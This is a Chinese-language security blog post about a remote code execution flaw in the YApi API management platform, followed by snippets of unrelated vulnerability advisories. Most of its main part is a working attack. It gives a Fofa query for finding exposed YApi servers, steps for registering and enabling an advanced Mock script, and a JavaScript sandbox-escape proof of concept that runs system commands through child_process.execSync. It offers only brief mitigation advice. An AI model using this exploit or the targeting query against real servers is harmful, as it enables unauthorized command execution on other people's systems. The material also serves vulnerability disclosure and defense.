Yapi Mock 远程代码执行漏洞

VSole2021-07-09 08:43:59

漏洞描述

YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响

Fofa:app="YApi"

默认开启注册功能

注册后新建项目

添加接口

高级Mock>脚本>开启,写入POC并保存:

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

保存后预览:

Yapi作者已经停止更新。临时修复建议禁止用户注册,具体配置参考原文链接:

https://github.com/YMFE/yapi/issues/2099

远程代码执行漏洞mock
本作品采用《CC 协议》,转载必须注明作者和本文链接
YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。
YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。
Laravel官方发布安全通告,修复了一个存在于Laravel中的远程代码执行漏洞漏洞编号:CVE-2021-43503,漏洞威胁等级:严重,漏洞评分:9.8。
​云安全风险情报
2023-09-26 13:48:20
当前各行业基础设施和服务向云逐渐迁移,随之而来针对云上资产的攻击也不断出现,掌握云上风险态势成为企业安全的重要环节。腾讯安全基于云原生安全体系,通过实时监测各类针对云上资产的攻击行为,持续感知在野攻击情况。经过安全专家的分析和挖掘,漏洞是攻击链上的重要一环,既能看到“老而弥新”漏洞的自动化批量攻击,也可发现新曝光漏洞开始迅速武器化,此外还涉及一些尚未公开的潜在风险被攻击者利用。
笔者片面的从多年乙方经验(不涉及监管层面能拿到的数据)的技术层面来讨论下大攻防演练多人运动下的溯源反制思路,以及作为反制团队如何与蓝队其他成员之间进行配合反制相关的工作。 如有写的不对的地方及遗漏的地方(肯定有的),请多多交流。
鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。处置建议1、安全更新: 目前官方已发布安全更新,建议受影响客户安装更新 https://github.com/top-think/framework/releases2、自查方案: ThinkPHP 6 打开app/middleware.php 如果 \think\middleware\LoadLangPack::class 没有注释,代表着受此漏洞影响。
对此,安识科技建议广大用户及时升级到安全版本,并做好资产自查以及预防工作,以免遭受黑客攻击。GitLab 主要对 group 和 project 两个维度进行代码和文档管理。漏洞危害 攻击者可利用该漏洞通过 GitHub API 构造恶意数据执行远程代码攻击,最终获取服务器最高权限。解决方案 当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。
鉴于该漏洞影响范围极大,建议企业尽快做好自查及防护。
近日,瑞星公司发布《2021年中国网络安全报告》,该报告综合瑞星“云安全”系
0x01 漏洞概述IBM WebSphere Application Server在今年6月发布了一则漏洞通告,cve编号为:CVE-2020-4450。该漏洞允许攻击者通过iiop向WAS进行网络请求,最终在WAS上执行任意代码。
VSole
网络安全专家